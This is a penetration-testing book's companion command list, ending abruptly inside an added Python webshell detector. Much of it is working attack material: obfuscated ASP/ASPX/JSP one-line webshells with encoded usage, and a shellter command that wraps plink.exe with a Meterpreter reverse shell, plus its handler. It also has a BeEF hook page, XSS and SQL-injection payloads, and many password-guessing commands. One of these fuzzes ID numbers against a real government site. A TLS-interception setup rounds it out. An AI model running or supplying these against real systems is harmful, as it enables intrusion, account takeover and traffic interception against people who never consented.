Kali Linux Penetration Testing Tools (3rd Edition): Command List and Errata

Link to the errata    Supplementary notes for Kali 2020.1
List of commands and URLs

Chapter 1

Chapter 2

Raspberry Pi Kali image

Creating a virtual machine

VirtualBox installer

Kali environment setup

Installing VMware Tools
apt update
apt -y reinstall open-vm-tools-desktop fuse
reboot

Script to repair open-vm-tools (OVT) when it stops working

Script /usr/local/sbin/reOVT.sh:
#!/bin/bash
# Restart the vmblock FUSE mount and the VMware Tools daemons
# (drag-and-drop, shared clipboard, display resizing)
systemctl stop run-vmblock\\x2dfuse.mount
killall -q -w vmtoolsd
systemctl start run-vmblock\\x2dfuse.mount
systemctl enable run-vmblock\\x2dfuse.mount
vmware-user-suid-wrapper vmtoolsd -n vmusr 2>/dev/null
vmtoolsd -b /var/run/vmroot 2>/dev/null

Installing Firefox
echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt update
apt install firefox-mozilla-build

Installing Chrome
apt update
cd /tmp/
wget -c https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome-stable_current_amd64.deb
## If apt reports unmet dependencies, run "apt-get install -f" first, then repeat step 3 (the dpkg -i line).

Fix for Chrome refusing to run as root
In Chrome's launcher script (the google-chrome wrapper that sets $HERE), change the final exec line to the following. --no-sandbox disables Chrome's renderer sandbox, so do this only in a disposable lab VM:
exec -a "$0" "$HERE/chrome" "$@" --user-data-dir --test-type --no-sandbox

Installing Kali on a USB stick
 Download the Kali USB image (and check it against the SHA256SUMS file published next to it)
wget https://cdimage.kali.org/kali-2019.1a/kali-linux-2019.1a-amd64.iso

 Write the image to the USB stick (confirm with lsblk that /dev/sdb really is the stick: dd overwrites the target without asking)
dd if=kali-linux-2019.1a-amd64.iso of=/dev/sdb bs=512K status=progress
sync


Installing a VNC server
 Edit /etc/systemd/system/tightvncserver.service
[Unit]
Description=TightVNC Server
After=sshd.service

[Service]
Type=forking
ExecStart=/usr/bin/vncserver :1 -geometry 1280x800
ExecStop=/usr/bin/vncserver -kill :1
User=root

[Install]
WantedBy=multi-user.target

 Set the owner, group and permissions of tightvncserver.service
chown root:root /etc/systemd/system/tightvncserver.service
chmod 755 /etc/systemd/system/tightvncserver.service

Setting up 4G mobile internet
 USB device mode-switch reference table
 Edit /etc/wvdial.conf (APN, Username and Password are placeholders for the carrier's values)
[Dialer E3272]
Phone = *99#
APN = internet
Username = username
Password = password
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0
Init3 = AT+CGDCONT=1,"IP","internet"
Modem = /dev/ttyUSB0
Baud = 460800
Stupid Mode = 1

Chapter 3

(no entries)

Chapter 4

Installing Nessus

Download Nessus

Registering the activation code
Apply for a Nessus activation code

Installing OpenVAS

Configure OpenVAS to start at boot
 Edit /etc/systemd/system/rc-local.service
[Unit]
Description=Execute on Booting
ConditionPathExists=/etc/rc.local

[Service]
Type=forking
ExecStart=/etc/rc.local start
ExecStop=/etc/rc.local stop
StandardOutput=tty
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

 Set the owner, group and permissions of rc-local.service
chown root:root /etc/systemd/system/rc-local.service
chmod 755 /etc/systemd/system/rc-local.service

 Enable rc-local.service at boot
systemctl enable rc-local.service

 Create /etc/rc.local
#!/bin/sh -e
# Wrapper so rc-local.service can start and stop the OpenVAS services

case "$1" in
    start)
        openvas-start
        ;;
    stop)
        openvas-stop
        ;;
    restart)
        openvas-stop
        sleep 5
        openvas-start
        ;;
    *)
        echo "Usage: /etc/rc.local {start | stop | restart}"
        exit 1
        ;;
esac

exit 0

 Set the owner, group and permissions of rc.local
chown root:root /etc/rc.local
chmod 755 /etc/rc.local

Installing OWASP ZAP

Download OWASP ZAP

Chapter 5

Downloading and mounting Metasploitable

Download the Metasploitable VM image
 Porting Metasploitable2 to VirtualBox
  Convert the VMware disk image to VirtualBox format
"C:\Program Files\Oracle\VirtualBox\VBoxManage" clonemedium disk "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux\Metasploitable.vmdk" "D:\metasploitable-linux-2.0.0\Metasploitable2-Linux\Metasploitable.vdi" --format VDI

Using iptables as a firewall for the lab environment

iptables packet-flow diagram

Chapter 6

Google Hacking

GHDB: ready-made Google Hacking queries

Shodan: Shodan home page

Wikipedia: country code reference

Other online whois services


Using vulnerability databases


DNS zone transfers

DNS zone transfer example site

dnstracer

List of DNS record types

fierce

 Header example
GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: <script src="https://ha.ckers.org/xss.js"></script>

DNSRecon

Download subdomains-top1mil.txt

 Batch user check with swaks (the same RCPT TO probe smtp-user-enum uses)
for E in $(cat email.lst)
do
    swaks --to "$E" --server test-server.example.com --quit-after RCPT --hide-all
    # non-zero exit: the server rejected RCPT TO for this address
    [ $? -ne 0 ] && echo "$E"
done
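The RCPT TO exchange the loop above relies on, as an added example that is not code from the book or its companion page. It runs an in-process mock SMTP server (constructed: the banner and the mailboxes in KNOWN_USERS are made up) and a client that does what swaks --quit-after RCPT does: EHLO, MAIL FROM, one RCPT TO per candidate address, then QUIT, using the reply code to decide whether the mailbox exists.

```python
"""RCPT TO user enumeration against a constructed mock SMTP server."""
import socket
import threading

KNOWN_USERS = {"admin", "jsmith", "postmaster"}   # constructed mailbox list


def _send(f, line: bytes):
    f.write(line + b"\r\n")
    f.flush()


def _serve_one(conn):
    """Just enough of RFC 5321 to answer EHLO/MAIL/RCPT/RSET/QUIT."""
    f = conn.makefile("rwb")
    _send(f, b"220 test-server.example.com ESMTP")
    while True:
        line = f.readline()
        if not line:
            break
        cmd = line.strip()
        verb = cmd[:4].upper()
        if verb in (b"HELO", b"EHLO"):
            _send(f, b"250 test-server.example.com")
        elif cmd.upper().startswith(b"MAIL FROM:"):
            _send(f, b"250 2.1.0 Ok")
        elif cmd.upper().startswith(b"RCPT TO:"):
            addr = cmd.split(b":", 1)[1].strip().strip(b"<>").decode()
            local = addr.split("@", 1)[0].lower()
            if local in KNOWN_USERS:
                _send(f, b"250 2.1.5 Ok")
            else:   # the leak: a distinct code for an unknown mailbox
                _send(f, b"550 5.1.1 <" + addr.encode() + b">: Recipient address rejected")
        elif verb == b"RSET":
            _send(f, b"250 2.0.0 Ok")
        elif verb == b"QUIT":
            _send(f, b"221 2.0.0 Bye")
            break
        else:
            _send(f, b"502 5.5.2 Command not implemented")
    f.close()
    conn.close()


def start_mock_server():
    """Start the mock on an ephemeral loopback port; return (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


def _reply_code(f) -> int:
    """Read one reply (continuation lines use 'NNN-'); return its 3-digit code."""
    while True:
        line = f.readline()
        if not line:
            raise ConnectionError("server closed the connection")
        if len(line) >= 4 and line[3:4] == b" ":
            return int(line[:3])


def enumerate_users(host, port, candidates, mail_from="probe@example.com", timeout=5):
    """Return {address: True if RCPT TO was accepted (2xx), else False}."""
    result = {}
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rwb")
        if _reply_code(f) != 220:
            raise ConnectionError("no SMTP greeting")
        _send(f, b"EHLO probe.example.com")
        _reply_code(f)
        _send(f, b"MAIL FROM:<" + mail_from.encode() + b">")
        _reply_code(f)
        for addr in candidates:
            _send(f, b"RCPT TO:<" + addr.encode() + b">")
            code = _reply_code(f)
            # 250 = mailbox exists, 550 = unknown; a 4xx such as 452 "too many
            # recipients" means "RSET and retry", not "absent"
            result[addr] = 200 <= code < 300
        _send(f, b"QUIT")
        _reply_code(f)
    return result


if __name__ == "__main__":
    host, port = start_mock_server()
    probes = ["admin@example.com", "nobody@example.com"]
    for addr, ok in enumerate_users(host, port, probes).items():
        print(addr, "exists" if ok else "rejected")
```

Against a real server the only change is the host and port; a server that answers 250 to every RCPT TO (catch-all) makes this technique useless, which is what the swaks exit-code check above cannot tell you on its own.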

Collecting SSL/TLS information

sslscan; online SSL scanning tool


Chapter 7


Chapter 8

Lynis

 Payload file example 1: payload01.txt
GET /foobar/index.php?file=TRAVERSAL HTTP/1.0
Host: www.qwertyfoobar.org
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-MX,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.qwertyfoobar.org/main.php
Cookie: user=johndoe; abc=1379415096; file=TRAVERSAL; command=get

 Payload file example 2: payload02.txt
GET /unauthenticated/TRAVERSAL HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:5.0.1) Gecko/20100101 Firefox/5.0.1

Chapter 9

OWASP ZAP

ZAP 2.8.x Heads Up Display (HUD)

Burp Suite

Table 9-1: account and password lists for the test examples
 user.lst (used for uid):
admin
test
jsmith
user
john
merry
queen
king
damon

 password.lst (used for passw):
123456
12345
password
abc123
computer
qwerty
a1b2c3
123abc
admin
test
demo1234
user

BeEF

 Vulnerable page example
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title></title>

<script src="http://192.168.1.106:3000/hook.js"></script>
</head>
<body>
<div style="font-size:16pt;color:red">This is BeEF test.</div>
</body>
</html>

XSSer

Injection into GET parameters
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_r/?' -g 'name=XSS' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0'

Injection into POST parameters
xsser -u 'http://192.168.18.133/dvwa/vulnerabilities/xss_s/' -p 'txtName=XSS&mtxMessage=XSS&btnSign=Sign+Guestbook' --cookie 'security=low; PHPSESSID=fd833736f3ade65c56d557596e46c501' --auto --user-agent 'Mozilla/5.0' --follow-redirects --Dom

Through a proxy, with a forged Referer
xsser -i URLs.lst --proxy http://localhost:8118 --referer www.uu.com

Automatic payload injection, hex-encoded
xsser -u http://host.com --auto --Hex -v --save

Injecting a custom payload (the single quotes inside the payload must be escaped for the shell)
xsser -i urls.txt --payload 'a="get";b="URL(\"";c="javascript:";d="alert('\''XSS'\'');\")";eval(a+b+c+d);' --Une

Inject 40 pages crawled to depth 4
xsser -c40 --Cw=4 -u "http://host.com"

POST parameter injection, with statistics output
xsser -u "http://host.com" -p "/index.php?target=search&subtarget=top&searchstring=XSS" -s

Simple injection
xsser -u "http://host.com" -g "bs/?q=XSS" --Dos

Multiple targets
xsser -i urls.lst --auto --timeout 20 --threads 16 --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s -v --Dos

Create a GIF image carrying an XSS script
xsser --imx Picture.gif

External payload for a GET parameter
xsser -u host.com -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

Cross-site tracing (XST) references
XSSer reference example 1
XSSer reference example 2

Chapter 10

(no entries)

Chapter 11

SQLMap

Attacking the crackme example
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --dbs --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin&sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --tables -D bank --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin&sendbutton1=Login" -p "LoginName" --batch
sqlmap -u "http://crackme.cenzic.com/kelev/php/login.php" --method=POST --threads=8 --columns -D bank -T user --data="hLoginType=&hPageName=accttransaction.php&whoislog=Welcome+to+CrackMeBank+Investments&hUserId=0&LoginName=admin&Password=admin&sendbutton1=Login" -p "LoginName" --batch

SQLninja

 Edit sqlninja.conf
gzip -d /usr/share/doc/sqlninja/sqlninja.conf.example.gz
cp /usr/share/doc/sqlninja/sqlninja.conf.example /root/sqlninja.conf

 Example of injection into a GET request parameter (lines ending in $ are truncated in this listing)
--httprequest_start--
GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherp$
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418$
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/p$
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Connection: close
--httprequest_end--

 Example of injection into a POST request parameter
--httprequest_start--
POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://demo.testfire.net/bank/login.aspx
Cookie: ASP.NET_SessionId=5l023szuvchlvuezvur00d45; amSessionId=71241312664
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uid=aaa';__SQL2INJECT__&passw=eeee&btnSubmit=Login
--httprequest_end--

HexorBase

Download the Oracle Client for Linux
Download cx_Oracle-5.2.tar.gz

Chapter 12

hydra

 Guessing credentials for a web login form
First form:
hydra -L ~/user.lst -P ~/password.lst http-post-form://demo.testfire.net/doLogin:"uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

Second form:
hydra -L ~/user.lst -P ~/password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"

 When the failure string contains Chinese characters, pass it as UTF-8 byte escapes (the escapes below spell 登入失敗, "login failed"):
hydra -l root -P pwds.lst www.tester.com:260 http-post-form "/cgi-bin/admin/sessmgr.cgi:user=^USER^&pwd=^PASS^&act=login&savepwd=1:\xe7\x99\xbb\xe5\x85\xa5\xe5\xa4\xb1\xe6\x95\x97"

patator

 http_fuzz module
patator http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500

patator http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401

patator http_fuzz url=http://10.0.0.1/login.php method=POST body='userid=COMBO00&passw=COMBO01' 0=users.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in' -l /tmp/phpmysql

patator http_fuzz url=https://pdis.moj.gov.tw/U100/U102-1.aspx method=POST body='ctl00$ContentPlaceHolder1$txtIDN=FILE0&ctl00$ContentPlaceHolder1$ddlSYEAR=102' 0=/root/Downloads/ID_List.txt follow=1 accept_cookie=1 -x ignore:fgrep='目前未有符合條件'

 smtp_rcpt and smtp_login modules
patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt

patator smtp_rcpt host=10.0.0.1 user=FILE0@localhost 0=logins.txt mail_from=bar@example.com -x ignore:fgrep='User unknown' -x retry:code=421

patator smtp_login host=10.0.0.1 user=FILE0@localhost password=FILE1 0=logins.txt 1=passw.txt

 smb_login module
patator smb_login host=FILE0 0=hosts.txt user=COMBO10 password_hash=COMBO12:COMBO13 1=pwdump.txt

smb_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwords.txt -x ignore:fgrep=STATUS_ACCOUNT_LOCKED_OUT

 mssql_login module
patator mssql_login host=10.0.0.1 user=sa password=FILE0 0=passwords.txt -x ignore:fgrep='Login failed for user'

 mysql_login module
patator mysql_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Access denied for user'

 ftp_login module
patator ftp_login host=10.0.0.1 user=COMBO00 password=COMBO01 0=userdata.txt -x ignore:fgrep='Login incorrect'

patator ftp_login host=NET0 user=anonymous password=test@example.com 0=10.0.0.0/24

 unzip_pass module
patator unzip_pass zipfile=file.zip password=FILE0 0=passwords.txt -x ignore:code!=0

 Cracking the testfire login with the http_fuzz module
patator http_fuzz url=http://demo.testfire.net/doLogin body="uid=FILE0&passw=FILE1&btnSubmit=Login" method=POST follow=1 accept_cookie=1 persistent=1 before_urls=http://demo.testfire.net/login.jsp 0=/root/user.lst 1=/root/password.lst -x ignore:fgrep="Login Failed"

Medusa

 cvs module
medusa -M cvs -m DIR:/some_project

 ftp module
medusa -M ftp -h host -u username -p password

medusa -M ftp -h host -u username -p password -s

medusa -M ftp -h host -u username -p password -m MODE:EXPLICIT

 http module
medusa -M http -m USER-AGENT:"g3rg3 gerg" -m DIR:/exchange/

medusa -M http -m CUSTOM-HEADER:"Cookie: SMCHALLENGE=YES"

 imap module
medusa -M imap -m AUTH:PLAIN -m TAG:A01 -m DOMAIN:mydm -h host -u foo -p bar

medusa -M imap -m AUTH:NTLM -m DOMAIN:mydm -h host -u foo -p bar

medusa -M imap -m AUTH:NTLM -h host -u foo@mydm -p bar

medusa -M imap -m AUTH:LOGIN -h host -u 'mydm\\foo' -p bar

 mysql module
medusa -M mysql -h 192.168.18.15 -u userId -p pAssw0rd

medusa -M mysql -h 192.168.18.15 -u userId -p 39b52a209cf03d62 -m PASS:HASH

 pcanywhere module
medusa -M pcanywhere -h 192.168.18.15 -u userId -p pAssw0rd -m DOMAIN:mydm

 pop3 module
medusa -M pop3 -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst

medusa -M pop3 -m DOMAIN:hacker.com -h 192.168.18.131 -U user.lst -P password.lst

 postgres module
medusa -M postgres -m DB:msf -h 127.0.0.1 -u msf -p msfpass

 rsh module
medusa -M rsh -h 192.168.18.133 -U user.lst -p pass

 smbnt module
medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst

medusa -M smbnt -h 192.168.18.131 -U users.lst -P password.lst -m GROUP:mydm

medusa -M smbnt -h 192.168.18.131 -C pwdump.txt -m PASS:HASH -m GROUP:mydm

medusa -M smbnt -H hosts.txt -C pwdump.txt -U users.lst -m PASS:HASH

medusa -M smbnt -H hosts.txt -u administrator -p 92D887C8010492C2944E2DF489A880E4:7A2EDE4F51BC5A03984C6BA2C239CF63::: -m PASS:HASH

 smtp-vrfy module
medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p hacker.com

 smtp module
medusa -M smtp -m AUTH:NTLM -h 192.168.18.56 -U users.lst -P password.lst

medusa -M smtp -m EHLO:world -h 192.168.18.56 -U users.lst -P password.lst

 snmp module
medusa -M snmp -m TIMEOUT:2 -m ACCESS:WRITE -h 192.168.18.199 -U users.lst -P password.lst

 ssh module
medusa -M ssh -m BANNER:SSH-2.0-GOODMAN -h 192.168.18.131 -U users.lst -P password.lst

 svn module
medusa -M svn -m BRANCH:"svn://172.31.10.144/comm-lib" -h 172.31.10.144 -U users.lst -P password.lst

 telnet module
medusa -M telnet -m MODE:AS400 -h 192.168.18.131 -U user.lst -P password.lst

 vnc module
medusa -M vnc -m MAXSLEEP:120 -m DOMAIN:mydm -h 192.168.18.2 -U user.lst -P password.lst

 web-form module
medusa -h testasp.vulnweb.com -U ~/user.lst -P ~/password.lst -M web-form -m FORM-DATA:"post?tfUName=&tfUPass=" -m USER-AGENT:"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36" -m FORM:"/Login.asp?RetURL=%2FDefault%2Easp%3F" -m DENY-SIGNAL:"Invalid login!" -m CUSTOM-HEADER:"Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F"
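What hydra's http-post-form, patator's http_fuzz and medusa's web-form module do under the hood, as an added example that is not code from the book. It runs a mock of a testfire-style login (GET /login.jsp hands out a session cookie; POST /doLogin answers "Login Failed" unless uid/passw are right and a session cookie is present) and a guesser that mirrors the hydra lines above: fetch the cookie page first (the C=/login.jsp part), POST each uid/passw pair, and count a reply that lacks the failure marker as a hit. VALID, the cookie value and the short lists are constructed; the marker is compared as raw bytes, which is also how a non-ASCII string such as the \xe7\x99\xbb... form given to hydra is handled.

```python
r"""Web-form credential guessing with a cookie pre-fetch, against a mock."""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID = {"jsmith": "demo1234"}        # constructed: the only real account
FAIL_MARK = b"Login Failed"           # failure string, as raw bytes


class MockLogin(BaseHTTPRequestHandler):
    def log_message(self, *args):     # silence request logging
        pass

    def do_GET(self):                 # /login.jsp: issue a session cookie
        self.send_response(200)
        self.send_header("Set-Cookie", "JSESSIONID=c0ffee; Path=/")
        self.end_headers()
        self.wfile.write(b"<form action=/doLogin method=post></form>")

    def do_POST(self):                # /doLogin: needs a session AND the right pair
        n = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(n).decode())
        uid = form.get("uid", [""])[0]
        pw = form.get("passw", [""])[0]
        has_session = "JSESSIONID=" in self.headers.get("Cookie", "")
        ok = has_session and VALID.get(uid) == pw
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Welcome " + uid.encode() if ok else FAIL_MARK)


def start_mock():
    """Serve the mock on an ephemeral loopback port; return (host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address


def guess(host, port, users, passwords, cookie_url="/login.jsp", fail_mark=FAIL_MARK):
    """Return [(user, password)] whose POST reply does not contain fail_mark."""
    found = []
    conn = http.client.HTTPConnection(host, port, timeout=5)
    for u in users:
        for p in passwords:
            cookie = ""
            if cookie_url:            # C=/login.jsp: fresh session before each try
                conn.request("GET", cookie_url)
                r = conn.getresponse()
                r.read()
                cookie = r.getheader("Set-Cookie", "").split(";", 1)[0]
            body = urllib.parse.urlencode({"uid": u, "passw": p, "btnSubmit": "Login"})
            conn.request("POST", "/doLogin", body=body, headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": cookie})
            r = conn.getresponse()
            if fail_mark not in r.read():
                found.append((u, p))
    conn.close()
    return found


if __name__ == "__main__":
    host, port = start_mock()
    print(guess(host, port, ["admin", "jsmith"], ["123456", "demo1234"]))
```

Leaving out the cookie step (cookie_url=None) makes every attempt fail on this mock, which is the situation the C= option exists for: a form that silently rejects posts without a live session looks identical to a wrong password unless you look at why the failure string appears.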

rainbowCrack

How rainbow tables work
Buying rainbow tables

Chapter 13

sslsniff

Creating a forged certificate
openssl req -config openssl.cnf -new -x509 -extensions v3_ca -keyout private/myca.key -out myca.crt -days 3650

openssl ca -config openssl.cnf -policy policy_anything -out mytest.crt -infiles mytest.csr

mkdir /usr/share/sslsniff/certs/spoofed_site/

cat mytest.crt mytest.key > /usr/share/sslsniff/certs/spoofed_site/mytest.pem


SSLsplit

Create the CA private key ca.key and certificate ca.crt with OpenSSL
Create x509v3ca.cnf:
[ req ]
distinguished_name = reqdn

[ reqdn ]

[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always


Generate the CA private key (ca.key) first, then sign the ca.crt certificate with it. The book uses a 1024-bit key and SHA-1, both weak by today's standards; 2048 bits and -sha256 work just as well here:
openssl genrsa -out ca.key 1024

openssl req -new -nodes -x509 -sha1 -out ca.crt -key ca.key -config x509v3ca.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650


Redirect the users' traffic with iptables
echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -F

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443


Run the sslsplit proxy
sslsplit -D -l /root/sslsplit/connections.log -S /root/sslsplit/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

Ghost Phisher

Wireless adapter buying guide 1
Wireless adapter buying guide 2

DNSChef

Example file for the --file option
[A]
mail.google.com.tw=192.168.18.133
mail.yahoo.com=192.168.18.133
*.google.com=192.168.18.130
*.yahoo.com=192.168.18.130

[AAAA]
mail.google.com.tw=fe80::20c:29ff:fef0:b63
mail.yahoo.com=fe80::20c:29ff:fef0:b63
*.google.com=fe80::20c:29ff:fef0:b61
*.yahoo.com=fe80::20c:29ff:fef0:b61

[MX]
*.google.com=mail.google.com.tw
*.yahoo.com=mail.yahoo.com

[NS]
*.google.com=ns1.google.com
*.yahoo.com=ns1.yahoo.com
*.google.com=ns2.google.com
*.yahoo.com=ns2.yahoo.com

[CNAME] # Queries for alias records
*.google.com=www.google.com
*.yahoo.com=w3.yahoo.com

[TXT]
*.google.com=This is a fake GOOGLE site!
*.yahoo.com=This is a fake YAHOO site!

[PTR]
*.18.168.192.in-addr.arpa=google.com
*.18.168.192.in-addr.arpa=yahoo.com

[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.google.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600
*.yahoo.com=ns.google.com. hostmaster.google.com. 1 10800 3600 604800 3600

# Full example: https://github.com/iphelix/dnschef/blob/master/dnschef.ini

dnschef example
dnschef --fakeip=192.168.18.130 --fakealias=www.google.com,tw.yahoo.com --interface 0.0.0.0 -q

dnschef.ini reference example


Chapter 14

Covering communications (tunnelling)

stunnel for Windows
HTTPTunnel for Windows

shellter

Wrapping plink.exe
cp /usr/share/windows-binaries/plink.exe /tmp/
shellter -a -f /tmp/plink.exe -p Meterpreter_Reverse_TCP --lhost 192.168.18.133 --port 4444 --junk

Set up the msfconsole reverse-connection handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.18.133
set LPORT 4444
run


Backdoor Factory 

Installing the older Backdoor Factory
apt autopurge backdoor-factory
cd /usr/share/
git clone https://github.com/secretsquirrel/the-backdoor-factory
cd the-backdoor-factory
./install.sh
ln -s /usr/share/the-backdoor-factory/backdoor.py /usr/bin/backdoor-factory

One-line webshells (一句話木馬)

ASP one-liners
<% If Request("l")<>"" Then ExecuteGlobal(Request("l")) %>

<% X=Request("l"):If X<>"" Then Execute(X) %>

<% execute(eval(chr(114) + chr(101) + chr(113) + chr(117) + chr(101) + chr(115) + chr(116))("L")) %>



ASPX one-liners
<%@ Page Language="Jscript"%>

<%eval(Request.Item["l"],"unsafe");%>

<%@ Page Language = Jscript %>

<%var/*-*-*/P/*-*-*/=/*-*-*/"e"+"v"+/*-*-*/"a"+"l"/*-*-*/+"("+"R"+"e"+/*-*-*/"q"+/*-*-*/"u"+/*-*-*/"e"/*-*-*/+"s"+/*-*-*/"t"+"[/*--*/"L"/*-*-*/]"+ ","+"\""+"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"+"\""+")";eval (/*--*/P/*-*-*/,/*--*/"u"+"n"+"s"/*-*-*/+"a"+"f"+"e"/*--*/);%>



JSP one-liner (writes parameter m into the file named by parameter l under the web root)

<% if(request.getParameter("l")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("l"))).write(request.getParameter("m").getBytes()); %>


ASP example 1 (writes code into a.asp through the one-liner)
dim fs, f, a

a="(the code to be written into a.asp goes here)"

set fs=Server.CreateObject("Scripting.FileSystemObject")

set f=fs.OpenTextFile(server.MapPath("a.asp"),8,true,-1)

f.WriteLine(a)

f.Close

set f=nothing

set fs=nothing

URL-encode the code above and send it as http://localhost/hole.asp?l=<URL-encoded string>

ASP example 2 (reads decode.asp back through the one-liner)
dim fs,r

set fs=Server.CreateObject("Scripting.FileSystemObject")

Set R=fs.OpenTextFile(Server.MapPath("decode.asp"), 1)

do while R.AtEndOfStream = false

Response.Write(Server.HTMLEncode(R.ReadLine)+"<br>")

loop

set R=nothing

set fs=nothing

URL-encode the code above and send it as follows:
http://localhost/hole.asp?L=dim%20fs%2Cr%3Aset%20fs%3DServer.CreateObject(%22Scripting.FileSystemObject%22)%3ASet%20R%3Dfs.OpenTextFile(Server.MapPath(%22decode.asp%22)%2C%201)%3Ado%20while%20R.AtEndOfStream%20%3D%20false%3AResponse.Write(Server.HTMLEncode(R.ReadLine)%2B%22%3Cbr%3E%22)%3Aloop%3Aset%20R%3Dnothing%3Aset%20fs%3Dnothing%0A
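Static detection of the one-line webshells listed above, as an added example that is not code from the book. SAMPLES holds the ASP, ASPX and JSP one-liners shown on this page plus a constructed benign page for contrast. The detector normalises each file first (strips /* */ comments, glues "a"+"b" and "a"&"b" string concatenations back together, decodes chr(N) calls) so that the comment-split ASPX variant and the chr()-built ASP variant fall to the same rules as the plain forms. The rule names and scores are my own.

```python
"""Normalise-then-match detector for one-line ASP/ASPX/JSP webshells."""
import re

SAMPLES = {
    "asp1.asp": r'''<% If Request("l")<>"" Then ExecuteGlobal(Request("l")) %>''',
    "asp2.asp": r'''<% X=Request("l"):If X<>"" Then Execute(X) %>''',
    "asp3.asp": r'''<% execute(eval(chr(114) + chr(101) + chr(113) + chr(117) + chr(101) + chr(115) + chr(116))("L")) %>''',
    "aspx1.aspx": r'''<%@ Page Language="Jscript"%><%eval(Request.Item["l"],"unsafe");%>''',
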